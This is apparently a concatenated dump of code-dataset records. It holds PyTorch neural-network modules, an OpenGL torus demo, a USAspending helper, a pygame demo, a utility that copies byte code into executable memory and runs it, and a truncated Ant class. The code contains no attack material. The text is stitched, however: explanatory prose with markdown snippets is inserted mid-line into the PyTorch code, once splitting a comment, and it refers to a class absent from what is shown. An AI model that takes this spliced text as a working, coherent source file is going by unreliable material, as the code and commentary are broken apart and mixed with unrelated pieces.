# The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # A tensor of shape (batch_size, longest_seq, *) is expected and a list of len = batch_size and lengths[0] = longest_seq\n # Maxpooling is done over the second index\n mask = self._get_mask(lengths, max_length, batch_first=True, device=device)\n # By masking with -inf, it is ensured that DOMs that are actually not there do not have an influence on the max pooling.\n seq = seq.masked_fill(~mask, float('-inf'))\n if self._batch_first:\n seq, _ = torch.max(seq, dim=1)\n else:\n raise ValueError('Not sure when batch not first - MaxPool')\n return seq\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n # The 'None' is a 
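`ManyToOneAttention` differs from the seq2seq blocks in that the key is a single learned vector: each time step's score is a dot product with that vector, and the softmax-weighted sum collapses the sequence to one vector per event. A compact sketch of the collapse (padding mask omitted; `k` stands in for the learned parameter):

```python
import torch
from math import sqrt

B, L, F = 2, 5, 8
seq = torch.randn(B, L, F)
k = torch.randn(F)                             # stand-in for the learned key

scores = torch.matmul(seq, k) / sqrt(F)        # (B, L) -- one score per step
weights = torch.softmax(scores, dim=-1)
out = torch.matmul(weights.unsqueeze(1), seq)  # (B, 1, F)
print(out.squeeze(1).shape)                    # torch.Size([2, 8])
```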
placeholder so dimensions are matched.\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(2)\n return mask\n\nclass Mish(nn.Module):\n \n def __init__(self):\n \n super(Mish, self).__init__()\n self._tanh = torch.nn.Tanh()\n self._softplus = torch.nn.Softplus()\n \n def forward(self, x):\n output = x * self._tanh(\n self._softplus(\n x\n )\n )\n return output\n\nclass NormNonlinWeight(nn.Module):\n\n def __init__(self, arch_dict, layer_dict, n_in, n_out, norm=None):\n super(NormNonlinWeight, self).__init__()\n self.norm = norm\n if self.norm:\n self.normalize = add_norm(arch_dict, layer_dict, n_in)\n self.nonlin = add_non_lin(arch_dict, layer_dict)\n self.linear = nn.Linear(in_features=n_in, out_features=n_out)\n \n def forward(self, x, device=None):\n if self.norm:\n output = self.linear(self.nonlin((self.normalize(x))))\n else:\n output = self.linear(self.nonlin(x))\n \n return output\n\nclass ResBlock(nn.Module):\n \"\"\"A Residual block as proposed in 'Identity Mappings in Deep Residual Networks'\n \"\"\" \n def __init__(self, arch_dict, layer_dict, n_in, n_out, norm=False):\n super(ResBlock, self).__init__()\n self.n_in = n_in\n self.n_out = n_out\n if n_in != n_out:\n self.linear0 = nn.Linear(in_features=n_in, out_features=n_out)\n\n if norm:\n self.norm1 = add_norm(arch_dict, layer_dict, n_out)\n self.non_lin1 = add_non_lin(arch_dict, arch_dict['nonlin'])\n self.linear1 = nn.Linear(in_features=n_out, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.linear1)\n if norm:\n self.norm2 = add_norm(arch_dict, layer_dict, n_out)\n self.non_lin2 = add_non_lin(arch_dict, arch_dict['nonlin'])\n self.linear2 = nn.Linear(in_features=n_out, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.linear2)\n\n def forward(self, seq, device=None):\n\n if self.n_in != self.n_out:\n seq = self.linear0(seq)\n \n res = self.linear1(self.non_lin1(self.norm1(seq)))\n res = self.linear2(self.non_lin2(self.norm2(res)))\n\n return seq+res\n\nclass ResAttention(nn.Module):\n \n def __init__(self, arch_dict, layer_dict, n_in, n_out, batch_first=True):\n super(ResAttention, self).__init__()\n self.n_in = n_in\n self.n_out = n_out\n self.n_layers = layer_dict['n_res_layers']\n self.norm = layer_dict.get('norm', False)\n\n if self.n_in != self.n_out:\n self.linear0 = nn.Linear(in_features=self.n_in, out_features=self.n_out)\n \n self.attention = SelfAttention(arch_dict, self.n_out, self.n_out, batch_first=batch_first)\n self.post_attntn = nn.Sequential(*[NormNonlinWeight(arch_dict, layer_dict, self.n_out, self.n_out, norm=self.norm) for i in range(self.n_layers)])\n \n def forward(self, seq, lengths, device=None):\n if self.n_in != self.n_out:\n seq = self.linear0(seq)\n post_attention = self.attention(seq, lengths, device=device)\n post_attention = self.post_attntn(post_attention)\n \n return seq+post_attention\n\nclass SelfAttention(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'. Uses no value-vectors, but just the sequence itself. 
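`Mish` composes three primitives, x * tanh(softplus(x)): smooth, non-monotonic, and approximately linear for large positive inputs. A closed-form check against the module's building blocks:

```python
import torch
import torch.nn.functional as F

x = torch.linspace(-3.0, 3.0, 7)
print(x * torch.tanh(F.softplus(x)))
# ~0 for large negative x, ~x for large positive x, and mish(0) = 0
```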
Furthermore, experimenting with only normalizing after nonlinearity.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, n_in, n_out, batch_first=True):\n super(SelfAttention, self).__init__()\n self.arch_dict = arch_dict\n self.n_in = n_in\n self.n_out = n_out\n self._batch_first = batch_first\n\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n\n self.softmax = nn.Softmax(dim=-1)\n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # Find queries and keys\n q = self.Q(seq)\n k = self.K(seq)\n \n # Attention\n output = self._calc_self_attention(\n q, \n k, \n seq, \n lengths, \n max_length, \n batch_first=self._batch_first, \n device=device\n )\n\n return output\n\n def _calc_self_attention(self, q, k, v, lengths, max_length, batch_first=False, device=None):\n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n weights = torch.matmul(q, k.transpose(-2, -1)) / sqrt(self.n_out)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n weights = weights.masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n output = torch.matmul(weights, v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(1)\n return mask\n\nclass SoftPlusSigma(nn.Module):\n\n def __init__(self, min_sigma=1e-3):\n super(SoftPlusSigma, self).__init__()\n self._min_sigma = min_sigma\n self._softplus = torch.nn.Softplus()\n \n def forward(self, x, device=None):\n\n # if not device:\n # raise ValueError('A device must be supplied!')\n \n n_features = x.shape[-1]//2\n mean = x[:, :n_features]+0.0\n sigma = self._min_sigma+self._softplus(\n x[:, n_features:]\n )\n out = torch.cat((mean, sigma), dim=-1)\n return out\n\nclass Tanh(nn.Module):\n \n def __init__(self, layer_dict=None):\n \n super(Tanh, self).__init__()\n self._tanh = torch.nn.Tanh()\n self._scale = 1.0 if layer_dict is None else layer_dict['scale']\n \n def forward(self, x, device=None):\n output = self._scale * self._tanh(x/self._scale)\n \n return output\n\n#* ======================================================================== \n#* MODEL FUNCTIONS\n#* ========================================================================\n\ndef add_LSTM_module(arch_dict, layer_dict, modules):\n n_neurons = len(layer_dict['input_sizes'])-1\n \n for i_neurons in range(n_neurons):\n isize = layer_dict['input_sizes'][i_neurons]\n hsize = layer_dict['input_sizes'][i_neurons+1]\n bidir = 
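`SoftPlusSigma` splits the network's final output in half: the first half passes through unchanged as means, the second is pushed through softplus plus a small floor so the predicted sigmas stay strictly positive, the usual construction when training against a Gaussian negative log-likelihood. A sketch of how such an output would feed an NLL term (the loss form here is my assumption; the project defines its losses elsewhere):

```python
import torch
import torch.nn.functional as F

raw = torch.randn(4, 6)                 # network output for 3 targets
n = raw.shape[-1] // 2
mean = raw[:, :n]
sigma = 1e-3 + F.softplus(raw[:, n:])   # strictly positive

target = torch.randn(4, 3)
nll = (torch.log(sigma) + 0.5 * ((target - mean) / sigma) ** 2).mean()
print(float(nll))
```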
layer_dict['bidir']\n modules.append(nn.LSTM(input_size=isize, hidden_size=hsize, bidirectional=bidir, batch_first=True))\n return modules\n\ndef add_linear_embedder(arch_dict, layer_dict):\n n_layers = len(layer_dict['input_sizes'])-1\n\n layers = []\n for i_layer in range(n_layers):\n isize = layer_dict['input_sizes'][i_layer]\n hsize = layer_dict['input_sizes'][i_layer+1]\n \n layers.append(ResBlock(arch_dict, layer_dict, ))\n # Add a matrix to linearly \n layers.append(nn.Linear(in_features=isize, out_features=hsize))\n init_weights(arch_dict, arch_dict['nonlin'], layers[-1])\n if layer_dict.get('LayerNorm', False):\n layers.append(nn.LayerNorm(hsize))\n layers.append(add_non_lin(arch_dict, arch_dict['nonlin']))\n \n return nn.Sequential(*layers)\n\ndef add_ResBlock(arch_dict, layer_dict):\n n_ins = layer_dict['input_sizes'][:-1]\n n_outs = layer_dict['input_sizes'][1:]\n\n layers = []\n for n_in, n_out in zip(n_ins, n_outs):\n layers.append(ResBlock(arch_dict, layer_dict, n_in, n_out, layer_dict.get('norm', False)))\n \n return nn.Sequential(*layers)\n\ndef add_linear_layers(arch_dict, layer_dict):\n n_layers = len(layer_dict['input_sizes'])-1\n \n # Add n_layers linear layers with non-linearity and normalization\n layers = []\n for i_layer in range(n_layers):\n isize = layer_dict['input_sizes'][i_layer]\n hsize = layer_dict['input_sizes'][i_layer+1]\n\n # Add layer and initialize its weights\n layers.append(nn.Linear(in_features=isize, out_features=hsize))\n init_weights(arch_dict, arch_dict['nonlin'], layers[-1])\n\n # If last layer, do not add non-linearities or normalization\n if i_layer+1 == n_layers: continue\n\n # If not, add non-linearities and normalization in required order\n else:\n if layer_dict['norm_before_nonlin']:\n\n # Only add normalization layer if wanted!\n if arch_dict['norm']['norm'] != None:\n layers.append(add_norm(arch_dict, arch_dict['norm'], hsize))\n layers.append(add_non_lin(arch_dict, arch_dict['nonlin']))\n\n else:\n layers.append(add_non_lin(arch_dict, arch_dict['nonlin']))\n if arch_dict['norm']['norm'] != None:\n layers.append(add_norm(arch_dict, arch_dict['norm'], hsize))\n\n return nn.Sequential(*layers)\n\ndef add_non_lin(arch_dict, layer_dict):\n if arch_dict['nonlin']['func'] == 'ReLU': \n return nn.ReLU()\n \n elif arch_dict['nonlin']['func'] == 'LeakyReLU':\n negslope = arch_dict['nonlin'].get('negslope', 0.01)\n return nn.LeakyReLU(negative_slope=negslope)\n \n elif arch_dict['nonlin']['func'] == 'Mish':\n return Mish()\n\n else:\n raise ValueError('An unknown nonlinearity could not be added in model generation.')\n\ndef add_norm(arch_dict, layer_dict, n_features):\n \n if layer_dict['norm'] == 'BatchNorm1D':\n \n if 'momentum' in layer_dict: mom = layer_dict['momentum']\n else: mom = 0.1\n\n if 'eps' in layer_dict: eps = layer_dict['eps']\n else: eps = 1e-05\n \n return nn.BatchNorm1d(n_features, eps=eps, momentum=mom)\n \n elif layer_dict['norm'] == 'LayerNorm':\n return nn.LayerNorm(n_features)\n\n else: \n raise ValueError('An unknown normalization could not be added in model generation.')\n\ndef add_AttentionBlock_modules(arch_dict, layer_dict, modules, mode=None):\n\n for n_in, n_out in zip(layer_dict['input_sizes'][:-1], layer_dict['input_sizes'][1:]):\n modules.append(AttentionBlock(arch_dict, layer_dict, n_in, n_out, mode=mode))\n \n return modules\n\ndef add_AttentionBlock2_modules(arch_dict, layer_dict, modules):\n\n for n_in, n_out in zip(layer_dict['input_sizes'][:-1], layer_dict['input_sizes'][1:]):\n 
modules.append(AttentionBlock2(arch_dict, layer_dict, n_in, n_out))\n \n return modules\n\ndef add_ResAttention_modules(arch_dict, layer_dict, modules):\n\n for n_in, n_out in zip(layer_dict['input_outputs'][:-1], layer_dict['input_outputs'][1:]):\n modules.append(ResAttention(arch_dict, layer_dict, n_in, n_out))\n\n return modules\n\ndef init_weights(arch_dict, layer_dict, layer):\n\n if type(layer) == torch.nn.modules.linear.Linear:\n if layer_dict['func'] == 'ReLU':\n \n nn.init.kaiming_normal_(layer.weight, a=0, mode='fan_in', nonlinearity='relu')\n \n elif layer_dict['func'] == 'LeakyReLU' or layer_dict['func'] == 'Mish':\n\n if 'negative_slope' in layer_dict: \n negslope = layer_dict['negative_slope']\n else: negslope = 0.01\n\n nn.init.kaiming_normal_(layer.weight, a=negslope, mode='fan_in', nonlinearity='leaky_relu')\n \n\n\n else:\n raise ValueError('An unknown initialization was encountered.')\n else:\n raise ValueError('An unknown initialization was encountered.')\n\ndef load_best_model(save_dir):\n \"\"\"Loads and prepares the best model for prediction for a given experiment\n \n Arguments:\n save_dir {str} -- Absolute or relative path to the trained model\n \n Returns:\n torch.nn.Module -- A torch NN.\n \"\"\" \n save_dir = get_project_root() + get_path_from_root(save_dir)\n hyper_pars, data_pars, arch_pars, meta_pars = load_model_pars(save_dir)\n device = get_device(meta_pars['gpu'][0])\n model_dir = save_dir+'/checkpoints'\n best_pars = find_best_model_pars(model_dir)\n n_devices = len(meta_pars['gpu'])\n model = MakeModel(arch_pars, device)\n \n # If several GPU's have been used during training, wrap it in dataparalelle\n if n_devices > 1:\n model = torch.nn.DataParallel(model, device_ids=None, output_device=None, dim=0)\n model.load_state_dict(torch.load(best_pars, map_location=torch.device(device)))\n model = model.to(device)\n model = model.float()\n\n return model\n\ndef find_model_input_vars(save_dir):\n \"\"\"Finds the scalar and sequential features a model requires\n \n Arguments:\n save_dir {str} -- Absolute or relative path to the trained model\n \n Returns:\n list1, list2 -- sequential feature names and scalar feature names.\n \"\"\" \n save_dir = get_project_root() + get_path_from_root(save_dir)\n hyper_pars, data_pars, arch_pars, meta_pars = load_model_pars(save_dir)\n seq_feat = data_pars['seq_feat']\n scalar_feat = data_pars['scalar_feat']\n\n return seq_feat, scalar_feat\n \ndef make_model_architecture(arch_dict):\n\n modules = nn.ModuleList()\n for layer in arch_dict['layers']:\n for key, layer_dict in layer.items():\n \n # has to split, since identical keys would get overwritten in OrderedDict\n # key = name.split('_')[-1]\n\n # Add modules of LSTMs, since we need to iterate over LSTM layers\n if key == 'ResBlock':\n modules.append(add_ResBlock(arch_dict, layer_dict))\n elif key == 'LSTM': \n modules = add_LSTM_module(arch_dict, layer_dict, modules)\n # Add a Sequential layer consisting of a linear block with normalization and nonlinearities\n elif key == 'Linear': \n modules.append(add_linear_layers(arch_dict, layer_dict))\n elif key == 'Conv1d':\n modules.append(add_conv1d(arch_dict, layer_dict))\n elif key == 'Linear_embedder':\n modules.append(add_linear_embedder(arch_dict, layer_dict))\n elif key == 'AttentionEncoder':\n modules = add_AttentionBlock_modules(arch_dict, layer_dict, modules, mode='encoder')\n elif key == 'AttentionDecoder':\n modules = add_AttentionBlock_modules(arch_dict, layer_dict, modules, mode='decoder')\n elif key == 
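`init_weights` matches the Kaiming-normal gain to the nonlinearity; for LeakyReLU (and Mish, treated here as its approximation) the negative slope enters the gain calculation. The equivalent direct call:

```python
import torch.nn as nn

layer = nn.Linear(128, 64)
nn.init.kaiming_normal_(layer.weight, a=0.01, mode='fan_in',
                        nonlinearity='leaky_relu')
```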
'AttentionBlock2':\n modules = add_AttentionBlock2_modules(arch_dict, layer_dict, modules)\n elif key == 'ManyToOneAttention':\n modules.append(ManyToOneAttention(arch_dict, layer_dict))\n elif key == 'MaxPool':\n modules.append(MaxPool())\n elif key == 'AveragePool':\n modules.append(AveragePool())\n elif key == 'LstmBlock':\n modules.append(LstmBlock(**layer_dict))\n elif key == 'RnnBlock':\n modules.append(RnnBlock(**layer_dict))\n elif key == 'BiLSTM':\n modules.append(BiLSTM(**layer_dict))\n elif key == 'ResAttention':\n modules = add_ResAttention_modules(arch_dict, layer_dict, modules)\n elif key == 'Angle2Unitvector':\n modules.append(Angle2Unitvector())\n elif key == 'SoftPlusSigma':\n modules.append(SoftPlusSigma())\n elif key == 'Tanh':\n modules.append(Tanh(layer_dict))\n else: \n raise ValueError('An unknown module (%s) could not be added in model generation.'%(key))\n\n return modules \n\ndef get_layer_names(arch_dict):\n '''Extracts layer names from an arch_dict\n '''\n layer_names = []\n for layer in arch_dict['layers']:\n for layer_name, dicts in layer.items():\n \n if layer_name == 'AttentionBlock':\n n_attention_modules = len(layer['AttentionBlock']['input_sizes'])-1\n for nth_attention_layer in range(n_attention_modules):\n layer_names.append(layer_name)\n \n elif layer_name == 'AttentionBlock2':\n n_attention_modules = len(layer['AttentionBlock2']['input_sizes'])-1\n for nth_attention_layer in range(n_attention_modules):\n layer_names.append(layer_name)\n \n elif layer_name == 'ResAttention':\n n_attention_modules = len(layer['ResAttention']['input_outputs'])-1\n for nth_attention_layer in range(n_attention_modules):\n layer_names.append(layer_name)\n \n elif layer_name == 'ResBlock':\n if dicts['type'] == 'seq':\n layer_names.append('ResBlockSeq')\n elif dicts['type'] == 'x':\n layer_names.append('ResBlock')\n else:\n raise KeyError('ResBlock: \"type\" MUST be supplied!')\n else:\n layer_names.append(layer_name)\n \n return layer_names\n","sub_path":"src/modules/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":82068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"98800475","text":"#tr0.py \r\n#based on lorenz.py by Stan Blank 22mar05\r\n#OpenGL by Alex Bourd and Matthew Stiak 9oct96\r\n#IrisGL by G Francis 9apr89, last revision 9sep96\r\n# written gkf 6apr05\r\n# there is still a python type error in here but it works as intended.\r\n# but actually, it can't work right this way ! 
what gives?\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nfrom OpenGL.GLU import *\r\nfrom math import *\r\nimport sys\r\n\r\n# Comment out the following two lines if your Python lacks Psyco.\r\nimport psyco\r\npsyco.full()\r\n\r\n# Bryn Keller's version of (cond?expr1:expr2)\r\ndef C(u): return cos(u*0.01745)\r\ndef S(u): return sin(u*0.01745)\r\ndef T(u): return tan(u*0.01745)\r\n\r\n# Need to be declared so functions can assign new values to them\r\nglobal wd\r\nglobal ht\r\nglobal MouseX\r\nglobal MouseY\r\nglobal aff\r\n\r\naff = ([1.0, 0.0, 0.0, 0.0,\r\n 0.0, 1.0, 0.0, 0.0,\r\n 0.0, 0.0, 1.0, 0.0,\r\n 0.0, 0.0, 0.0, 1.0])\r\n \r\ndef drawvert(th,ta):\r\n n0= C(th)*C(ta)\r\n n1= S(th)*C(ta)\r\n n2= S(ta)\r\n\r\n glColor3f(tan(n0*n0), tan(n1*n1), tan(n2*n2))\r\n glVertex3f(n0, n1, n2)\r\n#end drawvert\r\n\r\ndef drawtor():\r\n glBegin(GL_TRIANGLE_STRIP) \r\n for th in range(0,349,12):\r\n for ta in range (0,349, 12): \r\n drawvert(th,ta); drawvert(th+12,ta) \r\n glEnd() \r\n#end drawtor\r\n\r\n#assign initial window and mouse settings\r\nwd = 800\r\nht = 800\r\nMouseX = wd/2\r\nMouseY = ht/2\r\n\r\nbrake = 512. \r\n\r\ndef display():\r\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n glMultMatrixf(aff)\r\n drawtor()\r\n glutSwapBuffers()\r\n#end display()\r\n\r\n#typical keyboard callback \r\ndef keyboard(key, x, y):\r\n if key == chr(27) or key == 'q':\r\n sys.exit(0)\r\n glutPostRedisplay()\r\n#end keyboard()\r\n\r\n#Note that we must declare the globals again\r\ndef chaptrack():\r\n global MouseX\r\n global MouseY\r\n global wd\r\n global ht\r\n global aff\r\n lightPos = (-5.0, 5.0, 5.0, 1.0) \r\n dx = (MouseX-wd/2)/brake \r\n dy = (MouseY-ht/2)/brake\r\n glMatrixMode(GL_MODELVIEW)\r\n glPushMatrix()\r\n glLoadIdentity()\r\n glRotatef(dx,0,1.0,0.0)\r\n glRotatef(dy,1.0,0.0,0.0)\r\n glMultMatrixf(aff)\r\n aff = glGetFloatv(GL_MODELVIEW_MATRIX)\r\n glLightfv(GL_LIGHT0, GL_POSITION, lightPos)\r\n glPopMatrix()\r\n#end chaptrack()\r\n\r\n#traditional idle\r\ndef idle():\r\n chaptrack()\r\n glutPostRedisplay()\r\n#end idle()\r\n\r\n#ditto traditional mousemotion\r\n#Note globals\r\ndef mousemotion(x,y):\r\n global MouseX\r\n global MouseY\r\n MouseX = x\r\n MouseY = y\r\n#end mousemotion()\r\n\r\ndef init():\r\n glEnable(GL_LIGHTING)\r\n glEnable(GL_LIGHT0)\r\n glEnable(GL_COLOR_MATERIAL)\r\n glShadeModel(GL_SMOOTH)\r\n glClearColor(0.0, 0.0, 0.0, 1.0)\r\n\r\n#Traditional main subroutine\r\ndef main() :\r\n global wd\r\n global ht\r\n glutInitDisplayMode(GLUT_RGB | GLUT_DEPTH | GLUT_DOUBLE)\r\n glutInitWindowPosition(50, 50)\r\n glutInitWindowSize(wd, ht)\r\n glutInit([])\r\n glutCreateWindow(\"Octahedron\")\r\n glutKeyboardFunc(keyboard)\r\n glutDisplayFunc(display)\r\n glutIdleFunc(idle)\r\n glutPassiveMotionFunc(mousemotion)\r\n glEnable(GL_DEPTH_TEST)\r\n glShadeModel(GL_SMOOTH)\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n glOrtho(-2.0,2.0,-2.0,2.0,-2.0,2.0)\r\n \r\n init()\r\n glutMainLoop()\r\n\r\n#Necessary if we want to this program to run\r\nmain()\r\n","sub_path":"Python_Programming_in_OpenGL_Blank/withPsycoGeorge.py","file_name":"withPsycoGeorge.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"364416791","text":"import logging\n\nfrom usaspending_api.common.helpers.timing_helpers import timer\nfrom usaspending_api.broker.helpers.delete_stale_fabs import delete_stale_fabs\n\n\nlogger = 
logging.getLogger(\"console\")\n\n\ndef delete_fabs_transactions(ids_to_delete):\n \"\"\"\n ids_to_delete are afa_generated_unique ids\n \"\"\"\n if ids_to_delete:\n with timer(f\"deleting {len(ids_to_delete)} stale FABS data\", logger.info):\n update_award_ids = delete_stale_fabs(ids_to_delete)\n\n else:\n update_award_ids = []\n logger.info(\"Nothing to delete...\")\n\n return update_award_ids\n","sub_path":"usaspending_api/broker/helpers/delete_fabs_transactions.py","file_name":"delete_fabs_transactions.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502501142","text":"import sys, pygame\nfrom Entity import Entity\nfrom Config import Config\nfrom Graphic import Graphic\nfrom Platform import Platform\npygame.init()\nconfig = Config()\nsize = width, height = config.get_resolution_x(), config.get_resolution_y()\nspeed = [2, 2]\nblack = 0, 0, 0\nred = 255, 0, 0\nblue = 0, 0, 255\n\nscreen = pygame.display.set_mode(size)\n\nplayer = Entity((0, 0), pygame.image.load(\"grass.png\"))\nbackground = Graphic((0, 0), pygame.image.load(\"background.png\"))\n\n\nplatformGroup = [] # Maybe write a class for this\nplatformGroup.append(Platform([50, 50], blue, 200, 10))\n\nplayer.scale_image(50, 50)\ntimer = pygame.time.Clock()\nfpsFont = pygame.font.Font(None, 16)\nwhile 1:\n dx = [0, 0]\n screen.fill(black)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n if keysPressed[pygame.K_w] or keysPressed[pygame.K_UP]:\n dx[1] += -5\n if keysPressed[pygame.K_s] or keysPressed[pygame.K_DOWN]:\n dx[1] += 5\n if keysPressed[pygame.K_a] or keysPressed[pygame.K_LEFT]:\n dx[0] += -5\n if keysPressed[pygame.K_d] or keysPressed[pygame.K_RIGHT]:\n dx[0] += 5\n background.draw(screen)\n result = False\n for platform in platformGroup:\n if not result:\n result = platform.collide(player.get_rect(), dx, blue)\n platform.draw(screen)\n if result:\n dx = [0, 0]\n player.update(dx)\n player.draw(screen)\n fps_render = fpsFont.render(str(int(timer.get_fps())), 1, red)\n screen.blit(fps_render, [0,0,0,0])\n pygame.display.flip()\n timer.tick(60)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"614572964","text":"# -*- coding: utf-8 -*-\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n#\n# See LICENSE for more details.\n#\n# Copyright (C) 2016-2017 Huawei Inc\nimport ctypes\nimport os\nimport platform\nimport subprocess\nimport sys\n\nPYTHON2 = sys.version_info[0] == 2\nBITS_64 = platform.architecture()[0] == \"64bit\"\nON_WINS = platform.system().lower() == 'windows'\n\n\ndef which(executable, path=None):\n if path is None:\n path = os.environ['PATH']\n paths = path.split(os.pathsep)\n extlist = ['']\n if sys.platform == 'win32':\n pathext = os.environ['PATHEXT'].lower().split(os.pathsep)\n (base, ext) = os.path.splitext(executable)\n if ext.lower() not in pathext:\n extlist = pathext\n for ext in 
extlist:\n execname = executable + ext\n if os.path.isfile(execname):\n return execname\n else:\n for p in paths:\n f = os.path.join(p, execname)\n if os.path.isfile(f):\n return f\n else:\n return None\n\n\ndef run(command, pipe_command=None):\n if not pipe_command:\n p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output = p1.communicate()[0]\n if not PYTHON2:\n output = output.decode(encoding='UTF-8')\n return p1.returncode, output\n else:\n p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p1.stdout.close()\n output = p2.communicate()[0]\n if not PYTHON2:\n output = output.decode(encoding='UTF-8')\n return p2.returncode, output\n\n\ndef asm_func(byte_code, restype=None, argtypes=()):\n byte_code = bytes.join(b'', byte_code)\n\n if ON_WINS:\n # Allocate a memory segment the size of the byte code, and make it executable\n size = len(byte_code)\n mem_commit = ctypes.c_ulong(0x1000)\n page_execute_readwrite = ctypes.c_ulong(0x40)\n address = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_size_t(size), mem_commit,\n page_execute_readwrite)\n if not address:\n raise Exception(\"Failed to VirtualAlloc\")\n\n # Copy the byte code into the memory segment\n memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(\n ctypes._memmove_addr)\n if memmove(address, byte_code, size) < 0:\n raise Exception(\"Failed to memmove\")\n else:\n # Allocate a memory segment the size of the byte code\n size = len(byte_code)\n address = ctypes.pythonapi.valloc(size)\n if not address:\n raise Exception(\"Failed to valloc\")\n\n # make it writable\n if ctypes.pythonapi.mprotect(address, size, 0x2) < 0:\n raise Exception(\"Failed to mprotect\")\n\n # Copy the byte code into the memory segment\n if ctypes.pythonapi.memmove(address, byte_code, size) < 0:\n raise Exception(\"Failed to memmove\")\n\n # Mark the memory segment as writeable and executable only\n\n # make it writable and executable\n if ctypes.pythonapi.mprotect(address, size, 0x2 | 0x4) < 0:\n raise Exception(\"Failed to mprotect\")\n\n # Cast the memory segment into a function\n functype = ctypes.CFUNCTYPE(restype, *argtypes)\n fun = functype(address)\n return fun, address\n\n\ndef free_func(address, size):\n # Free the function memory segment\n if ON_WINS:\n mem_release = ctypes.c_ulong(0x8000)\n ctypes.windll.kernel32.VirtualFree(address, size, mem_release)\n else:\n # Remove the executable tag on the memory\n if ctypes.pythonapi.mprotect(address, size, 0x1 | 0x2) < 0:\n raise Exception(\"Failed to mprotect\")\n\n ctypes.pythonapi.free(address)\n","sub_path":"library/python/utils/myutils/os.py","file_name":"os.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"39278258","text":"class Ant():\n def __init__(self,size=10):\n self.posit = 0\n self.dir = 1\n self.line = size\n def step(self):\n if self.dir==1:\n if self.posit!=(self.line-1):\n self.posit+=1\n else:\n if self.posit!=0:\n self.posit-=1\n def turn(self):\n if self.dir == 1:\n self.dir = -1\n else:\n self.dir = 1\n def setPos(self,pos):\n if pos>=0 and pos<=(self.line-1):\n self.posit = pos\n def display(self):\n output =\"\"\n for n in range(self.line):\n if n != self.posit:\n output += \".\"\n else:\n if self.dir ==1:\n output+=\">\"\n else:\n output+=\"<\"\n return 
